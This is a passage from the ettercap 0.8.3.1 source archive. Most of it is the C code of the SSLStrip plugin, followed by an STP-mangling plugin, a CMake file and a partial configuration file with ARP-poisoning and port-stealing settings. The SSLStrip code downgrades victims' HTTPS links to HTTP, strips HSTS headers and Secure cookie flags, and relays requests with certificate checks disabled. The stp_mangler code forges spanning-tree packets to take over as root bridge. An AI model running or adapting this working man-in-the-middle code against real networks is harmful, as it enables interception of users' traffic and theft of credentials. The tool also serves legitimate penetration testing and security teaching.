DEBUG_MSG("SSLStrip: Received connection: %p %p\n", connection, connection->request); if (connection->fd == -1) { DEBUG_MSG("SSLStrip: Failed to accept connection: %s.", strerror(errno)); SAFE_FREE(connection->request); SAFE_FREE(connection->response); SAFE_FREE(connection); continue; } sa = (struct sockaddr *)&client_ss; switch (sa->sa_family) { case AF_INET: sa4 = (struct sockaddr_in *)&client_ss; ip_addr_init(&(connection->ip[HTTP_CLIENT]), AF_INET, (u_char *)&(sa4->sin_addr.s_addr)); connection->port[HTTP_CLIENT] = sa4->sin_port; break; #ifdef WITH_IPV6 case AF_INET6: sa6 = (struct sockaddr_in6 *)&client_ss; ip_addr_init(&(connection->ip[HTTP_CLIENT]), AF_INET6, (u_char *)&(sa6->sin6_addr.s6_addr)); connection->port[HTTP_CLIENT] = sa6->sin6_port; break; #endif } connection->port[HTTP_SERVER] = htons(80); //connection->request->len = 0; /* set SO_KEEPALIVE */ if (setsockopt(connection->fd, SOL_SOCKET, SO_KEEPALIVE, &optval, optlen) < 0) { DEBUG_MSG("SSLStrip: Could not set up SO_KEEPALIVE"); } /* create detached thread */ ec_thread_new_detached("http_child_thread", "http child", &http_child_thread, connection, 1); } return NULL; } static int http_get_peer(struct http_connection *connection) { #ifndef OS_LINUX struct ec_session *s = NULL; struct packet_object po; void *ident= NULL; int i; memcpy(&po.L3.src, &connection->ip[HTTP_CLIENT], sizeof(struct ip_addr)); po.L4.src = connection->port[HTTP_CLIENT]; po.L4.dst = connection->port[HTTP_SERVER]; http_create_ident(&ident, &po); /* Wait for sniffing thread */ for (i=0; iip[HTTP_SERVER], s->data, sizeof(struct ip_addr)); SAFE_FREE(s->data); SAFE_FREE(s); SAFE_FREE(ident); #else struct sockaddr_storage ss; struct sockaddr_in *sa4; #if defined WITH_IPV6 && defined HAVE_IP6T_SO_ORIGINAL_DST struct sockaddr_in6 *sa6; #endif socklen_t ss_len = sizeof(struct sockaddr_storage); switch (ntohs(connection->ip[HTTP_CLIENT].addr_type)) { case AF_INET: if (getsockopt (connection->fd, SOL_IP, SO_ORIGINAL_DST, (struct sockaddr*)&ss, &ss_len) == -1) { WARN_MSG("getsockopt failed: %s", strerror(errno)); return -E_INVALID; } sa4 = (struct sockaddr_in *)&ss; ip_addr_init(&(connection->ip[HTTP_SERVER]), AF_INET, (u_char *)&(sa4->sin_addr.s_addr)); break; #if defined WITH_IPV6 && defined HAVE_IP6T_SO_ORIGINAL_DST case AF_INET6: if (getsockopt (connection->fd, IPPROTO_IPV6, IP6T_SO_ORIGINAL_DST, (struct sockaddr*)&ss, &ss_len) == -1) { WARN_MSG("getsockopt failed: %s", strerror(errno)); return -E_INVALID; } sa6 = (struct sockaddr_in6 *)&ss; ip_addr_init(&(connection->ip[HTTP_SERVER]), AF_INET6, (u_char *)&(sa6->sin6_addr.s6_addr)); break; #endif } #endif return E_SUCCESS; } #ifndef OS_LINUX static size_t http_create_ident(void **i, struct packet_object *po) { struct http_ident *ident; SAFE_CALLOC(ident, 1, sizeof(struct http_ident)); ident->magic = HTTP_MAGIC; memcpy(&ident->L3_src, &po->L3.src, sizeof(struct ip_addr)); ident->L4_src = po->L4.src; ident->L4_dst = po->L4.dst; /* return the ident */ *i = ident; return sizeof(struct http_ident); } #endif static int http_sync_conn(struct http_connection *connection) { if (http_get_peer(connection) != E_SUCCESS) return -E_INVALID; set_blocking(connection->fd, 0); return E_SUCCESS; } static int http_read(struct http_connection *connection, struct packet_object *po) { int len = 0, ret = -E_INVALID; int loops = HTTP_RETRY; do { len = read(connection->fd, po->DATA.data, HTTP_MAX); if(len <= 0) { /* in non-blocking mode we have to evaluate the socket error */ int err = 0; err = GET_SOCK_ERRNO(); if (err == EINTR || err == EAGAIN) { /* data not yet arrived, wait a bit and keep trying */ ec_usleep(MILLI2MICRO(HTTP_WAIT)); } else /* something went wrong */ break; } else { /* we got data - break up */ ret = E_SUCCESS; break; } } while (--loops > 0); po->DATA.len = len; /* either we got data or something went wrong or timed out */ return ret; } static void http_handle_request(struct http_connection *connection, struct packet_object *po) { struct https_link *link; SAFE_CALLOC(connection->request->url, 1, 512); if (connection->request->url==NULL) return; Find_Url(po->DATA.data, &connection->request->url); if (connection->request->url == NULL) { return; } //parse HTTP request if (!memcmp(po->DATA.data, "GET", 3)) { connection->request->method = HTTP_GET; } else if (!memcmp(po->DATA.data, "POST", 4)) { connection->request->method = HTTP_POST; } char *r = (char*)po->DATA.data; //Skip the first line of request if ((r = strstr((const char*)po->DATA.data, "\r\n")) == NULL) return; // This doesn't seem to look as a HTTP header r += 2; //Skip \r\n char *h = strdup(r); char *body = strdup(r); BUG_IF(h==NULL); BUG_IF(body==NULL); char *end_header = strstr(h, "\r\n\r\n"); if (!end_header) { SAFE_FREE(h); SAFE_FREE(body); return; //Something went really wrong here } *end_header = '\0'; char *header; char *saveptr; header = ec_strtok(h, "\r\n", &saveptr); while(header) { connection->request->headers = curl_slist_append(connection->request->headers, header); header = ec_strtok(NULL, "\r\n", &saveptr); } SAFE_FREE(h); char *b = strstr(body, "\r\n\r\n"); if (b != NULL) { b += 4; connection->request->payload = strdup(b); BUG_IF(connection->request->payload == NULL); } SAFE_FREE(body); int proto = PROTO_HTTP; LIST_LOCK; LIST_FOREACH(link, &https_links, next) { if (!strcmp(link->url, connection->request->url)) { proto = PROTO_HTTPS; break; } } LIST_UNLOCK; switch(proto) { case PROTO_HTTP: DEBUG_MSG("SSLStrip: Sending HTTP request"); break; case PROTO_HTTPS: DEBUG_MSG("SSLStrip: Sending HTTPs request"); break; } http_send(connection,po, proto); } static void http_send(struct http_connection *connection, struct packet_object *po, int proto) { curl_global_init(CURL_GLOBAL_ALL); connection->handle = curl_easy_init(); if(!connection->handle) { DEBUG_MSG("SSLStrip: Not enough memory to allocate CURL handle"); return; } char *url; //Allow decoders to run for request if (proto == PROTO_HTTPS) { curl_easy_setopt(connection->handle, CURLOPT_SSL_VERIFYPEER, 0L); curl_easy_setopt(connection->handle, CURLOPT_SSL_VERIFYHOST, 0L); SAFE_CALLOC(url, 1, strlen(connection->request->url)+strlen("https://")+1); snprintf(url, strlen(connection->request->url)+strlen("https://")+1, "https://%s", connection->request->url); } else { SAFE_CALLOC(url, 1, strlen(connection->request->url)+strlen("http://")+1); snprintf(url, strlen(connection->request->url)+strlen("http://")+1, "http://%s", connection->request->url); } if (url==NULL) { DEBUG_MSG("Not enough memory to allocate for URL %s\n", connection->request->url); return; } curl_easy_setopt(connection->handle, CURLOPT_HTTP_VERSION, CURL_HTTP_VERSION_1_1); curl_easy_setopt(connection->handle, CURLOPT_URL, url); curl_easy_setopt(connection->handle, CURLOPT_WRITEFUNCTION, http_receive_from_server); curl_easy_setopt(connection->handle, CURLOPT_WRITEDATA, connection); curl_easy_setopt(connection->handle, CURLOPT_ERRORBUFFER, connection->curl_err_buffer); curl_easy_setopt(connection->handle, CURLOPT_HEADER, 1L); curl_easy_setopt(connection->handle, CURLOPT_HTTPHEADER, connection->request->headers); curl_easy_setopt(connection->handle, CURLOPT_ACCEPT_ENCODING, "gzip"); curl_easy_setopt(connection->handle, CURLOPT_ACCEPT_ENCODING, "deflate"); curl_easy_setopt(connection->handle, CURLOPT_COOKIEFILE, ""); //Initialize cookie engine /* Only allow HTTP and HTTPS */ curl_easy_setopt(connection->handle, CURLOPT_PROTOCOLS, (long) CURLPROTO_HTTP | (long)CURLPROTO_HTTPS); curl_easy_setopt(connection->handle, CURLOPT_REDIR_PROTOCOLS, (long) CURLPROTO_HTTP | (long) CURLPROTO_HTTPS); if(connection->request->method == HTTP_POST) { curl_easy_setopt(connection->handle, CURLOPT_POST, 1L); curl_easy_setopt(connection->handle, CURLOPT_POSTFIELDS, connection->request->payload); curl_easy_setopt(connection->handle, CURLOPT_POSTFIELDSIZE, strlen(connection->request->payload)); } if(curl_easy_perform(connection->handle) != CURLE_OK) { DEBUG_MSG("Unable to send request to HTTP server: %s\n", connection->curl_err_buffer); return; } else { DEBUG_MSG("SSLStrip: Sent request to server"); } DEBUG_MSG("Before removing https: %s", connection->response->html); DEBUG_MSG("SSLStrip: Removing HTTPS"); http_remove_https(connection); http_remove_secure_from_cookie(connection); if(strstr(connection->response->html, "\r\nContent-Encoding:") || strstr(connection->response->html, "\r\nTransfer-Encoding:")) { http_remove_header("Content-Encoding", connection); http_remove_header("Transfer-Encoding", connection); } if(strstr(connection->response->html, "\r\nStrict-Transport-Security:")) { http_remove_header("Strict-Transport-Security", connection); } /* adjust content length header value */ http_update_content_length(connection); DEBUG_MSG("SSLStrip: after removing all %s", connection->response->html); //Send result back to client DEBUG_MSG("SSLStrip: Sending response back to client"); if (http_write(connection->fd, connection->response->html, connection->response->len) != E_SUCCESS){ DEBUG_MSG("Unable to send HTTP response back to client\n"); } else { DEBUG_MSG("Sent HTTP response back to client"); } //Allow decoders to run on HTTP response http_initialize_po(po, (u_char*)connection->response->html, connection->response->len); packet_destroy_object(po); po->len = po->DATA.len; po->L4.flags |= TH_PSH; packet_disp_data(po, po->DATA.data, po->DATA.len); DEBUG_MSG("SSLStrip: Calling parser for response"); http_parse_packet(connection, HTTP_SERVER, po); //Free up request if (connection->request->headers) { curl_slist_free_all(connection->request->headers); connection->request->headers = NULL; } if (connection->request->method == HTTP_POST) { SAFE_FREE(connection->request->payload); } SAFE_FREE(connection->request->url); SAFE_FREE(url); if(connection->handle) { curl_easy_cleanup(connection->handle); curl_global_cleanup(); connection->handle = NULL; } DEBUG_MSG("SSLStrip: Done"); } static int http_write(int fd, char *ptr, unsigned long int total_len) { int len, err; unsigned int bytes_sent = 0; int bytes_remaining = total_len; DEBUG_MSG("SSLStrip: Total length %lu", total_len); while (bytes_sent < total_len) { if(!ptr) break; len = write(fd, ptr+bytes_sent, bytes_remaining); if (len <= 0) { err = GET_SOCK_ERRNO(); DEBUG_MSG("http_write: SOCK ERR: %d", err); if (err != EAGAIN && err != EINTR) return -E_INVALID; } DEBUG_MSG("SSLStrip: Sent %d bytes", len); bytes_sent += len; bytes_remaining -= len; DEBUG_MSG("SSLStrip: Bytes sent %d", bytes_sent); ec_usleep(MILLI2MICRO(100)); // 100ms } return E_SUCCESS; } #if 0 static size_t http_write_to_server(void *ptr, size_t size, size_t nmemb, void *stream) { struct packet_object *po = (struct packet_object *)stream; DEBUG_MSG("SSLStrip: PO LEN : %ld Size: %ld", po->DATA.len, (size*nmemb)); DEBUG_MSG("SSLStrip: Copying %s", po->DATA.data); if ((size*nmemb) < po->DATA.len) { memcpy(ptr, po->DATA.data, size*nmemb); return size*nmemb; } else { memcpy(ptr, po->DATA.data, po->DATA.len); return po->DATA.len; } } #endif static u_int http_receive_from_server(char *ptr, size_t size, size_t nmemb, void *userdata) { struct http_connection *connection = (struct http_connection *)userdata; if (connection->response->len == 0) { //Initiailize buffer SAFE_CALLOC(connection->response->html, 1, size*nmemb); if (connection->response->html == NULL) return 0; memcpy(connection->response->html, ptr, size*nmemb); } else { char *b; SAFE_CALLOC(b, 1, connection->response->len+(size*nmemb)); BUG_IF(b == NULL); memcpy(b, connection->response->html, connection->response->len); memcpy(b+connection->response->len, ptr, size*nmemb); SAFE_FREE(connection->response->html); connection->response->html = b; //SAFE_REALLOC(connection->response->html, connection->response->len + (size*nmemb)); } connection->response->len += (size*nmemb); //connection->response->html[connection->response->len] = '\0'; return size*nmemb; } EC_THREAD_FUNC(http_child_thread) { struct packet_object po; int ret_val; struct http_connection *connection; connection = (struct http_connection *)args; ec_thread_init(); /* Get peer and set to non-blocking */ if (http_sync_conn(connection) == -E_INVALID) { DEBUG_MSG("SSLStrip: Could not get peer!!"); if (connection->fd != -1) close_socket(connection->fd); SAFE_FREE(connection->response); SAFE_FREE(connection->request); SAFE_FREE(connection); ec_thread_exit(); } /* A fake SYN ACK for profiles */ http_initialize_po(&po, NULL, 0); po.len = 64; po.L4.flags = (TH_SYN | TH_ACK); packet_disp_data(&po, po.DATA.data, po.DATA.len); http_parse_packet(connection, HTTP_SERVER, &po); http_initialize_po(&po, po.DATA.data, po.DATA.len); LOOP { http_initialize_po(&po, NULL, 0); ret_val = http_read(connection, &po); DEBUG_MSG("SSLStrip: Returned %d", ret_val); BREAK_ON_ERROR(ret_val, connection, po); if (ret_val == E_SUCCESS) { /* Look in the https_links list and if the url matches, send to HTTPS server. Otherwise send to HTTP server */ po.len = po.DATA.len; po.L4.flags |= TH_PSH; /* NULL terminate buffer */ po.DATA.data[po.DATA.len] = 0; packet_destroy_object(&po); packet_disp_data(&po, po.DATA.data, po.DATA.len); //DEBUG_MSG("SSLStrip: Calling parser for request"); http_parse_packet(connection, HTTP_CLIENT, &po); http_handle_request(connection, &po); } } return NULL; } static void http_remove_https(struct http_connection *connection) { char *buf_cpy = connection->response->html; size_t https_len = strlen("https://"); size_t http_len = strlen("http://"); struct https_link *l, *link; size_t offset = 0; int rc; int ovector[30]; char changed = 0; char *new_html, *url; size_t new_size = 0; size_t size = connection->response->len; int url_len, match_start, match_end = 0; if(!buf_cpy) return; SAFE_CALLOC(new_html, 1, connection->response->len); BUG_IF(new_html==NULL); while(offset < size && (rc = pcre_exec(https_url_pcre, NULL, buf_cpy, size, offset, 0, ovector, 30)) > 0) { match_start = ovector[0]; match_end = ovector[1]; /* copy 1:1 up to match */ memcpy(new_html + new_size, buf_cpy + offset, match_start - offset); new_size += match_start - offset; /* extract URL w/o https:// */ url_len = match_end - match_start - https_len; url = strndup(buf_cpy + match_start + https_len, url_len); if(url == NULL) { USER_MSG("SSLStrip: http_remove_https: url is NULL\n"); return; } /* copy "http://" */ memcpy(new_html + new_size, "http://", http_len); new_size += http_len; /* append URL */ memcpy(new_html + new_size, url, url_len); new_size += url_len; /* set new offset for next round */ offset = match_end; //Add URL to list char found = 0; LIST_LOCK; LIST_FOREACH(link, &https_links, next) { if(!strcmp(link->url, url)) { found=1; break; } } LIST_UNLOCK; if(!found) { SAFE_CALLOC(l, 1, sizeof(struct https_link)); BUG_IF(l==NULL); SAFE_CALLOC(l->url, 1, 1 + url_len); BUG_IF(l->url==NULL); memcpy(l->url, url, url_len); Decode_Url((u_char *)l->url); l->last_used = time(NULL); DEBUG_MSG("SSLStrip: Inserting %s to HTTPS List", l->url); LIST_INSERT_HEAD(&https_links, l, next); } SAFE_FREE(url); if (!changed) changed=1; } if (changed) { //Copy rest of data (if any) memcpy(new_html + new_size, buf_cpy + offset, size - offset); new_size += size - offset; /* replace response */ SAFE_FREE(connection->response->html); connection->response->html = new_html; connection->response->len = new_size; } else { /* Thanks but we don't need it */ SAFE_FREE(new_html); } /* Iterate through all http_request and remove any that have not been used lately */ struct https_link *link_tmp; time_t now = time(NULL); LIST_LOCK; LIST_FOREACH_SAFE(l, &https_links, next, link_tmp) { if(now - l->last_used >= REQUEST_TIMEOUT) { LIST_REMOVE(l, next); SAFE_FREE(l); } } LIST_UNLOCK; } static void http_parse_packet(struct http_connection *connection, int direction, struct packet_object *po) { FUNC_DECODER_PTR(start_decoder); int len; memcpy(&po->L3.src, &connection->ip[direction], sizeof(struct ip_addr)); memcpy(&po->L3.dst, &connection->ip[!direction], sizeof(struct ip_addr)); po->L4.src = connection->port[direction]; po->L4.dst = connection->port[!direction]; po->flags |= PO_FROMSSLSTRIP; /* get time */ gettimeofday(&po->ts, NULL); switch(ip_addr_is_local(&PACKET->L3.src, NULL)) { case E_SUCCESS: PACKET->PASSIVE.flags &= ~(FP_HOST_NONLOCAL); PACKET->PASSIVE.flags |= FP_HOST_LOCAL; break; case -E_NOTFOUND: PACKET->PASSIVE.flags &= ~FP_HOST_LOCAL; PACKET->PASSIVE.flags |= FP_HOST_NONLOCAL; break; case -E_INVALID: PACKET->PASSIVE.flags = FP_UNKNOWN; break; } /* let's start fromt he last stage of decoder chain */ //DEBUG_MSG("SSLStrip: Parsing %s", po->DATA.data); start_decoder = get_decoder(APP_LAYER, PL_DEFAULT); start_decoder(po->DATA.data, po->DATA.len, &len, po); } static void http_initialize_po(struct packet_object *po, u_char *p_data, size_t len) { /* * Allocate the data buffer and initialize * fake headers. Headers len is set to 0. * XXX - Be sure to not modify these len. */ memset(po, 0, sizeof(struct packet_object)); if (p_data == NULL) { SAFE_FREE(po->DATA.data); SAFE_CALLOC(po->DATA.data, 1, HTTP_MAX); po->DATA.len = HTTP_MAX; BUG_IF(po->DATA.data==NULL); } else { SAFE_FREE(po->DATA.data); po->DATA.data = p_data; po->DATA.len = len; } po->L2.header = po->DATA.data; po->L3.header = po->DATA.data; po->L3.options = po->DATA.data; po->L4.header = po->DATA.data; po->L4.options = po->DATA.data; po->fwd_packet = po->DATA.data; po->packet = po->DATA.data; po->L3.proto = htons(LL_TYPE_IP); po->L3.ttl = 64; po->L4.proto = NL_TYPE_TCP; } /* main HTTP listen thread, this will accept connections * destined to port 80 */ static int http_bind_wrapper(void) { bind_port = EC_MAGIC_16; struct sockaddr_in sa_in; #ifdef WITH_IPV6 struct sockaddr_in6 sa_in6; int optval = 1; #endif ec_thread_init(); DEBUG_MSG("http_listen_thread: initialized and ready"); main_fd = socket(AF_INET, SOCK_STREAM, 0); if (main_fd == -1) { /* oops, unable to create socket */ DEBUG_MSG("Unable to create socket() for HTTP..."); return -E_FATAL; } memset(&sa_in, 0, sizeof(sa_in)); sa_in.sin_family = AF_INET; sa_in.sin_addr.s_addr = INADDR_ANY; do { bind_port++; sa_in.sin_port = htons(bind_port); } while (bind(main_fd, (struct sockaddr *)&sa_in, sizeof(sa_in)) != 0); if(listen(main_fd, 100) == -1) { DEBUG_MSG("SSLStrip plugin: unable to listen() on socket"); return -E_FATAL; } #ifdef WITH_IPV6 /* create & bind IPv6 socket on the same port */ main_fd6 = socket(AF_INET6, SOCK_STREAM, 0); if (main_fd6 == -1) { /* unable to create socket */ DEBUG_MSG("SSLStrip: Unable to create socket() for HTTP over IPv6: %s.", strerror(errno)); return -E_FATAL; } memset(&sa_in6, 0, sizeof(sa_in6)); sa_in6.sin6_family = AF_INET6; sa_in6.sin6_addr = in6addr_any; sa_in6.sin6_port = htons(bind_port); /* we only listen on v6 as we use dedicated sockets per AF */ if (setsockopt(main_fd6, IPPROTO_IPV6, IPV6_V6ONLY, &optval, sizeof(optval)) == -1) { DEBUG_MSG("SSLStrip: Unable to set IPv6 socket to IPv6 only: %s.", strerror(errno)); return -E_FATAL; } /* bind to IPv6 on the same port as the IPv4 socket */ if (bind(main_fd6, (struct sockaddr *)&sa_in6, sizeof(sa_in6)) == -1) { DEBUG_MSG("SSLStrip: Unable to bind() IPv6 socket to port %d: %s.", bind_port, strerror(errno)); return -E_FATAL; } /* finally set socket into listen state */ if (listen(main_fd6, 100) == -1) { DEBUG_MSG("SSLStrip: Unable to listen() on IPv6 socket: %s.", strerror(errno)); return -E_FATAL; } #else /* properly init fd even when not used - necessary for select call */ main_fd6 = 0; #endif USER_MSG("SSLStrip plugin: bind 80 on %d\n", bind_port); if (ec_redirect(EC_REDIR_ACTION_INSERT, "http", EC_REDIR_PROTO_IPV4, NULL, 80, bind_port) != E_SUCCESS) return -E_FATAL; #ifdef WITH_IPV6 if (ec_redirect(EC_REDIR_ACTION_INSERT, "http", EC_REDIR_PROTO_IPV6, NULL, 80, bind_port) != E_SUCCESS) return -E_FATAL; #endif return E_SUCCESS; } static void http_wipe_connection(struct http_connection *connection) { DEBUG_MSG("SSLStrip: http_wipe_connection"); close_socket(connection->fd); SAFE_FREE(connection->response->html); SAFE_FREE(connection->request->payload); SAFE_FREE(connection->request->url); SAFE_FREE(connection->request); SAFE_FREE(connection->response); SAFE_FREE(connection); } void http_remove_header(char *header, struct http_connection *connection) { DEBUG_MSG("SSLStrip: http_remove_header"); if (strstr(connection->response->html, header)) { char *r = strdup(connection->response->html); size_t len = strlen(connection->response->html); if(r == NULL) { USER_MSG("SSLStrip: http_remove_header: r is NULL\n"); return; } char *b = strstr(r, header); char *end = strstr(b, "\r\n"); end += 2; int header_length = end - b; len -= header_length; int start = b - r; char *remaining = strdup(end); BUG_IF(remaining==NULL); memcpy(r+start, remaining, strlen(remaining)); SAFE_FREE(connection->response->html); connection->response->html = strndup(r, len); if(connection->response->html == NULL) { USER_MSG("SSLStrip: http_remove_header: connection->response->html is NULL\n"); return; } connection->response->len = len; SAFE_FREE(remaining); SAFE_FREE(r); } } void http_remove_secure_from_cookie(struct http_connection *connection) { if (!strstr(connection->response->html, "Set-Cookie")) { return; } size_t newlen = 0; size_t pos = 0; char *buf_cpy = connection->response->html; char *new_html; SAFE_CALLOC(new_html, 1, connection->response->len); char changed = 0; regmatch_t match[4]; while(!regexec(&find_cookie_re, buf_cpy, 4, match, REG_NOTBOL)) { memcpy(new_html+newlen, buf_cpy, match[1].rm_eo); newlen += match[1].rm_eo; memcpy(new_html+newlen, buf_cpy+match[3].rm_so, match[3].rm_eo - match[3].rm_so); newlen += match[3].rm_eo - match[3].rm_so; buf_cpy += match[0].rm_eo-2; pos += match[0].rm_eo-2; changed=1; } if (changed) { memcpy(new_html+newlen, buf_cpy, connection->response->len - pos); newlen += connection->response->len - pos; SAFE_FREE(connection->response->html); connection->response->html = new_html; connection->response->len = newlen; } else { SAFE_FREE(new_html); } } void http_update_content_length(struct http_connection *connection) { if (strstr(connection->response->html, "Content-Length: ")) { char *buf = connection->response->html; char *content_length = strstr(connection->response->html, "Content-Length:"); content_length += strlen("Content-Length: "); char c_length[20]; memset(&c_length, '\0', 20); snprintf(c_length, 20, "%lu", connection->response->len - (strstr(buf, "\r\n\r\n") + 4 - buf)); memcpy(buf+(content_length-buf), c_length, strlen(c_length)); } } // vim:ts=3:expandtab ettercap-0.8.3.1/plug-ins/stp_mangler/000775 000000 000000 00000000000 13711276346 017533 5ustar00rootroot000000 000000 ettercap-0.8.3.1/plug-ins/stp_mangler/stp_mangler.c000664 000000 000000 00000011752 13711276346 022220 0ustar00rootroot000000 000000 /* stp_mangler -- ettercap plugin -- Become root of a switches spanning tree Copyright (C) ALoR & NaGA This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ #include /* required for global variables */ #include /* required for plugin ops */ #include #include #include #include #include /* globals */ struct eth_header { u_int8 dha[ETH_ADDR_LEN]; /* destination eth addr */ u_int8 sha[ETH_ADDR_LEN]; /* source ether addr */ u_int16 proto; /* packet type ID field */ }; struct llc_header { u_int8 dsap; u_int8 ssap; u_int8 cf; u_int16 protocolid; u_int8 version; u_int8 BPDU_type; u_int8 BPDU_flags; }; struct stp_header { u_int16 root_priority; u_int8 root_id[6]; u_int8 root_path_cost[4]; u_int16 bridge_priority; u_int8 bridge_id[6]; u_int16 port_id; u_int16 message_age; u_int16 max_age; u_int16 hello_time; u_int16 forward_delay; }; #define FAKE_PCK_LEN 60 struct packet_object fake_po; char fake_pck[FAKE_PCK_LEN]; /* protos */ int plugin_load(void *); static int stp_mangler_init(void *); static int stp_mangler_fini(void *); EC_THREAD_FUNC(mangler); /* plugin operations */ struct plugin_ops stp_mangler_ops = { /* ettercap version MUST be the global EC_VERSION */ .ettercap_version = EC_VERSION, /* the name of the plugin */ .name = "stp_mangler", /* a short description of the plugin (max 50 chars) */ .info = "Become root of a switches spanning tree", /* the plugin version. */ .version = "1.0", /* activation function */ .init = &stp_mangler_init, /* deactivation function */ .fini = &stp_mangler_fini, }; /**********************************************************/ /* this function is called on plugin load */ int plugin_load(void *handle) { return plugin_register(handle, &stp_mangler_ops); } /******************* STANDARD FUNCTIONS *******************/ static int stp_mangler_init(void *dummy) { /* variable not used */ (void) dummy; /* It doesn't work if unoffensive */ if (EC_GBL_OPTIONS->unoffensive) { INSTANT_USER_MSG("stp_mangler: plugin doesn't work in UNOFFENSIVE mode\n"); return PLUGIN_FINISHED; } INSTANT_USER_MSG("stp_mangler: Start sending fake STP packets...\n"); /* create the flooding thread */ ec_thread_new("mangler", "STP mangler thread", &mangler, NULL); return PLUGIN_RUNNING; } static int stp_mangler_fini(void *dummy) { pthread_t pid; /* variable not used */ (void) dummy; pid = ec_thread_getpid("mangler"); /* the thread is active or not ? */ if (!pthread_equal(pid, ec_thread_getpid(NULL))) ec_thread_destroy(pid); INSTANT_USER_MSG("stp_mangler: plugin stopped...\n"); return PLUGIN_FINISHED; } EC_THREAD_FUNC(mangler) { struct eth_header *heth; struct llc_header *hllc; struct stp_header *hstp; u_char MultiMAC[6]={0x01,0x80,0xc2,0x00,0x00,0x00}; /* variable not used */ (void) EC_THREAD_PARAM; /* Avoid crappy compiler alignment :( */ heth = (struct eth_header *)fake_pck; hllc = (struct llc_header *)(fake_pck + 14); hstp = (struct stp_header *)(fake_pck + 22); /* Create a fake STP packet */ heth->proto = htons(0x0026); memcpy(heth->dha, MultiMAC, ETH_ADDR_LEN); memcpy(heth->sha, EC_GBL_IFACE->mac, ETH_ADDR_LEN); hllc->dsap = 0x42; hllc->ssap = 0x42; hllc->cf = 0x03; hstp->root_priority = 0; memcpy(hstp->root_id, EC_GBL_IFACE->mac, ETH_ADDR_LEN); hstp->bridge_priority = 0; memcpy(hstp->bridge_id, EC_GBL_IFACE->mac, ETH_ADDR_LEN); hstp->port_id = htons(0x8000); hstp->max_age = htons_inv(20); hstp->hello_time = htons_inv(2); hstp->forward_delay = htons_inv(15); packet_create_object(&fake_po, (u_char*)fake_pck, FAKE_PCK_LEN); /* init the thread and wait for start up */ ec_thread_init(); LOOP { CANCELLATION_POINT(); /* Send on the wire and wait */ send_to_L2(&fake_po); ec_usleep(SEC2MICRO(1)); } return NULL; } /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/share/000775 000000 000000 00000000000 13711276346 014564 5ustar00rootroot000000 000000 ettercap-0.8.3.1/share/CMakeLists.txt000664 000000 000000 00000002405 13711276346 017325 0ustar00rootroot000000 000000 if(ENABLE_IPV6) configure_file(etter.conf.v6 etter.conf COPYONLY) else() configure_file(etter.conf.v4 etter.conf COPYONLY) endif() set(EC_CONFFILES etter.dns etter.mdns etter.nbns ) set(EC_DATAFILES ettercap.png ettercap-small.png ettercap.svg etter.dns.examples etter.mdns.examples etter.fields etter.filter etterfilter.cnt etter.filter.examples etter.filter.kill etter.filter.pcre etter.filter.ssh etterfilter.tbl etter.finger.mac etter.finger.os etterlog.dtd etter.mime etter.services etter.ssl.crt ../AUTHORS ) if(NOT NO_INSTALL_LICENSE) set(EC_DATAFILES ${EC_DATAFILES} ../LICENSE) endif() foreach(f IN LISTS EC_DATAFILES EC_CONFFILES) configure_file(${f} ${f} COPYONLY) endforeach() install(FILES ${CMAKE_CURRENT_BINARY_DIR}/${EC_CONFFILES} ${CMAKE_CURRENT_BINARY_DIR}/etter.conf DESTINATION ${INSTALL_SYSCONFDIR}/ettercap) install(FILES ${CMAKE_CURRENT_BINARY_DIR}/${EC_DATAFILES} DESTINATION ${INSTALL_DATADIR}/ettercap) # since ettercap now uses this file as the application icon # we still need the icon even if the desktop file is not being installed if(ENABLE_GTK) install(FILES ettercap.svg DESTINATION ${ICON_DIR}) endif() ettercap-0.8.3.1/share/etter.conf.v4000664 000000 000000 00000021252 13711276346 017110 0ustar00rootroot000000 000000 ############################################################################ # # # ettercap -- etter.conf -- configuration file # # # # Copyright (C) ALoR & NaGA # # # # This program is free software; you can redistribute it and/or modify # # it under the terms of the GNU General Public License as published by # # the Free Software Foundation; either version 2 of the License, or # # (at your option) any later version. # # # # # ############################################################################ [privs] ec_uid = 65534 # nobody is the default ec_gid = 65534 # nobody is the default [mitm] arp_storm_delay = 10 # milliseconds arp_poison_smart = 0 # boolean arp_poison_warm_up = 1 # seconds arp_poison_delay = 10 # seconds arp_poison_icmp = 1 # boolean arp_poison_reply = 1 # boolean arp_poison_request = 0 # boolean arp_poison_equal_mac = 1 # boolean dhcp_lease_time = 1800 # seconds port_steal_delay = 10 # seconds port_steal_send_delay = 2000 # microseconds [connections] connection_timeout = 300 # seconds connection_idle = 5 # seconds connection_buffer = 10000 # bytes connect_timeout = 5 # seconds [stats] sampling_rate = 50 # number of packets [misc] close_on_eof = 1 # boolean value store_profiles = 1 # 0 = disabled; 1 = all; 2 = local; 3 = remote aggressive_dissectors = 1 # boolean value skip_forwarded_pcks = 1 # boolean value checksum_check = 0 # boolean value submit_fingerprint = 0 # boolean valid (set if you want ettercap to submit unknown finger prints) checksum_warning = 0 # boolean value (valid only if checksum_check is 1) sniffing_at_startup = 1 # boolean value geoip_support_enable = 1 # boolean value (set geoip_data_file of GeoIP database file cannot be located) gtkui_prefer_dark_theme = 0 # boolean value ############################################################################ # # You can specify what DISSECTORS are to be enabled or not... # # e.g.: ftp = 21 enabled on port 21 (tcp is implicit) # ftp = 2345 enabled on non standard port # ftp = 21,453 enabled on port 21 and 453 # ftp = 0 disabled # # NOTE: some dissectors have multiple default ports, if you specify a new # one, all the default ports will be overwritten # # #dissector default port [dissectors] ftp = 21 # tcp 21 ssh = 22 # tcp 22 telnet = 23 # tcp 23 smtp = 25 # tcp 25 dns = 53 # udp 53 dhcp = 67 # udp 68 http = 80 # tcp 80 ospf = 89 # ip 89 (IPPROTO 0x59) pop3 = 110 # tcp 110 #portmap = 111 # tcp / udp vrrp = 112 # ip 112 (IPPROTO 0x70) nntp = 119 # tcp 119 smb = 139,445 # tcp 139 445 imap = 143,220 # tcp 143 220 snmp = 161 # udp 161 bgp = 179 # tcp 179 ldap = 389 # tcp 389 https = 443 # tcp 443 ssmtp = 465 # tcp 465 rlogin = 512,513 # tcp 512 513 rip = 520 # udp 520 nntps = 563 # tcp 